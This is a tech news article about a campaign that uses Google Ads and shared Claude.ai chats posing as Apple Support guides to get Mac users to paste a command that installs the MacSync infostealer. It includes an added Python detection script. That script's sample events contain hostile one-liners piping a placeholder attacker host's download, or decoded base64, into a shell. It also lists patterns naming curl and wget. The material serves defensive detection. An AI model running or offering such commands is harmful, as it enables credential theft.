Claude Mac Download Scam: How Attackers Hijack Google Ads

By Craig Nash, tech writer at All Things Geek. Covers artificial intelligence, semiconductors, and computing hardware.

A Claude Mac malware scam is actively targeting developers and Mac users who search for legitimate Claude installation instructions, exploiting Google Ads and Claude.ai’s own shared chat feature to distribute information-stealing malware. Security engineer Berk Albayrak at Trendyol Group identified the campaign, which uses remarkably simple but effective social engineering: fake installation guides hosted on Claude.ai itself, presented as official Apple Support documentation. When users paste the provided command into Terminal, they unknowingly download and execute malware that harvests browser credentials, cookies, and macOS Keychain contents.

Key Takeaways

  • Scammers use Google Ads targeting “Claude mac download” searches to redirect users to malicious shared Claude.ai chats
  • Fake installation guides impersonate Apple Support and instruct users to paste Terminal commands that execute malware
  • MacSync infostealer targets browser credentials, cookies, and macOS Keychain data without dropping a traditional executable
  • Campaign bypasses URL-based security filters by hosting malware on legitimate claude.ai domain
  • Similar December campaign exploited ChatGPT and Grok shared chats using identical social engineering tactics

How the Claude Mac Malware Scam Works

The Claude Mac malware scam operates through a deceptively simple chain of trust exploitation. When a user searches Google for “Claude mac download,” a sponsored ad appears pointing to claude.ai—a legitimate domain. The ad directs users to a publicly shared Claude.ai chat that presents itself as an official “Claude Code on Mac” installation guide attributed to Apple Support. The chat then instructs the user to open Terminal and paste a command. That command silently downloads and executes malware using osascript, macOS’s built-in scripting engine, which lets the attacker run arbitrary code on the machine without installing a traditional executable binary.

What makes this attack particularly dangerous is that every visible element appears legitimate. The ad comes from Google, the destination is claude.ai, and the branding mimics Apple Support. A user accustomed to copy-pasting installation commands—a common practice among developers—has no obvious reason to suspect the instructions are malicious. The malware then harvests sensitive data: browser credentials, cookies stored in browsers like Chrome and Safari, and contents of the macOS Keychain, which stores passwords, API keys, and authentication tokens.

Some variants of the Claude Mac malware scam employ a two-stage infection chain. The initial command downloads a first-stage payload that profiles the system, determining what data is worth stealing before the second stage downloads and executes the main infostealer. Other variants skip profiling entirely and proceed directly to execution, prioritizing speed over reconnaissance.

Why This Campaign Bypasses Traditional Security

The Claude Mac malware scam succeeds where other malware distribution campaigns fail because it weaponizes legitimate infrastructure. Traditional malvertising relies on fake domains—attackers register lookalike sites like “claude-ai.com” or “c1aude.ai” to fool users into believing they are visiting the real service. Security tools can block these domains through reputation-based filtering. But this campaign uses the actual claude.ai domain, making URL-based security filters useless.

Similarly, the malicious instructions are hosted within Claude.ai’s own shared chat feature, a legitimate platform feature designed for collaboration and knowledge sharing. Security controls that scan URLs for malicious content pass these chats through because the URL itself—claude.ai—is trusted. The malware payload is embedded in natural language instructions rather than in a downloadable file, further evading file-based detection systems. This represents a broader shift in attacker tactics: instead of building fake infrastructure, they are abusing the legitimate features of trusted platforms.

The campaign also exploits a fundamental vulnerability in developer culture. Developers routinely copy and paste installation commands from documentation, package managers, and trusted sources. This practice is so normalized that a command presented as official documentation triggers little skepticism, especially when the surrounding context—the domain, the branding, the formatting—all appear authentic.

Related Threats and Broader Pattern

The Claude Mac malware scam is not an isolated incident. In December, security researchers identified a nearly identical campaign exploiting shared chats on ChatGPT and Grok using the same social engineering playbook: fake installation guides, copy-paste Terminal commands, and malware execution through legitimate platform features. Windows users have also been targeted with Claude Code-themed campaigns distributing different payloads, including variants of the Amatera infostealer and other credential-stealing malware. This pattern suggests attackers have identified AI platform shared chats as a reliable vector for malware distribution—low friction, high trust, and difficult to detect at scale.

The targeting of macOS Keychain specifically indicates attackers understand the value of the data they are stealing. The Keychain stores not just passwords but API keys, SSH credentials, and authentication tokens for development tools and cloud services. For a developer, compromised Keychain contents represent a gateway to compromising GitHub accounts, cloud infrastructure, and internal company systems.

What Mac Users Should Do Right Now

If you use Claude and searched for installation instructions recently, verify that you downloaded Claude from the official Anthropic website (anthropic.com) or through legitimate package managers like Homebrew. Do not paste Terminal commands from unfamiliar sources, even if they appear to come from official documentation. Legitimate installation guides from reputable companies rarely require users to paste long commands directly into Terminal without explanation—this is a hallmark of ClickFix social engineering attacks.

Check your browser for unauthorized extensions or changes to settings. If you believe you may have run a malicious command, change your passwords immediately, particularly for GitHub, cloud services, and any accounts that store sensitive credentials. Make sure built-in protections such as XProtect are up to date and consider a scan with third-party antivirus software, but be aware that sophisticated infostealers may not be detected by signature-based scanning if they focus on exfiltrating data rather than maintaining persistent access.

Anthropic and Google have been notified of the campaign. Both platforms have incentives to shut down the malicious chats and prevent similar ads, but the speed at which new variants appear suggests this will remain an ongoing cat-and-mouse game. Vigilance is the most reliable defense.

Is the Claude Mac malware scam still active?

Yes, the campaign was active at the time of reporting and variants continue to emerge. Both the malicious Google Ads and the shared Claude.ai chats hosting the fake installation guides were publicly accessible, suggesting attackers maintain multiple copies across different shared chat URLs to ensure continuity if individual chats are removed.

Can macOS security tools detect this malware?

Standard antivirus software may not detect the initial infection because the malware is executed through osascript rather than dropped as a traditional executable file. Detection depends on whether security tools monitor system behavior (such as unusual osascript activity) or only scan files. After infection, stolen data is exfiltrated to attacker-controlled servers, making post-infection detection more difficult.
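The behavioral angle above is what a defender can actually act on: flag osascript launched from an interactive terminal with an inline script that bridges into a shell and fetches or decodes a payload. The following is an added illustration, not code from the article or the researcher it cites; the event format, the `Finding` type, and the placeholder `attacker-host.invalid` are assumptions, and the sample events are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample process-creation events (not real telemetry), one per line as
# parent_process|child_process|command_line. The attacker host is a placeholder.
SAMPLE_EVENTS = """\
Terminal|osascript|osascript -e 'do shell script "curl -fsSL https://attacker-host.invalid/p | sh"'
Terminal|brew|brew install --cask claude
Script Editor|osascript|osascript /Users/dev/Scripts/rename_photos.scpt
Terminal|osascript|osascript -e 'display dialog "hello"'
zsh|osascript|osascript -e 'do shell script "echo aGVsbG8= | base64 -d | bash"'
"""

# Parents that indicate a human typed or pasted the command (assumption: a real
# collector usually reports the login shell, with Terminal as grandparent).
INTERACTIVE_PARENTS = {"Terminal", "zsh", "bash", "sh"}
SHELL_BRIDGE = re.compile(r"do shell script", re.IGNORECASE)
# Payload-delivery indicators; any one of them plus the shell bridge is enough.
INDICATORS = [
    ("network fetch tool inside script", re.compile(r"\b(curl|wget|nscurl)\b")),
    ("piped into a shell interpreter", re.compile(r"\|\s*(sh|bash|zsh)\b")),
    ("base64 decoding", re.compile(r"\bbase64\b")),
]

@dataclass
class Finding:
    command: str
    reasons: List[str] = field(default_factory=list)

def analyze_event(parent: str, child: str, cmdline: str) -> Optional[Finding]:
    """Flag osascript run interactively with an inline (-e) script that calls
    'do shell script' and shows at least one download/decode/exec indicator."""
    if child != "osascript" or parent not in INTERACTIVE_PARENTS:
        return None  # file-based scripts from Script Editor etc. are routine
    bridge = " -e " in cmdline and SHELL_BRIDGE.search(cmdline) is not None
    reasons = [label for label, rx in INDICATORS if rx.search(cmdline)]
    return Finding(cmdline, reasons) if bridge and reasons else None

def scan(log_text: str) -> List[Finding]:
    """Run the rule over every non-empty event line and collect findings."""
    findings = []
    for line in log_text.splitlines():
        if line.strip():
            parent, child, cmdline = line.split("|", 2)
            hit = analyze_event(parent, child, cmdline)
            if hit:
                findings.append(hit)
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.command, "->", "; ".join(f.reasons))
```

A benign `display dialog` one-liner and a saved `.scpt` run from Script Editor pass, while the two loader-style invocations are reported with the indicators that fired.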

How is this different from the December ChatGPT campaign?

The December campaign exploited ChatGPT and Grok shared chats using identical tactics but different malware payloads and infrastructure. The Claude Mac malware scam demonstrates that attackers have refined the technique and are systematically targeting multiple AI platforms, suggesting this is now a preferred distribution method for credential-stealing malware targeting developers.

The Claude Mac malware scam reveals a critical vulnerability in how we trust platforms and documentation. Attackers have learned that the most effective way to distribute malware is not to build fake infrastructure but to hijack legitimate platforms and exploit user behavior around installation and setup. As AI platforms become more central to developer workflows, they will continue to attract attackers seeking to compromise high-value targets. The defense is skepticism: verify sources, avoid blind copy-paste, and treat any installation instruction that arrives through an unexpected channel with suspicion, regardless of how official it appears.

Edited by the All Things Geek team.

Source: TechRadar
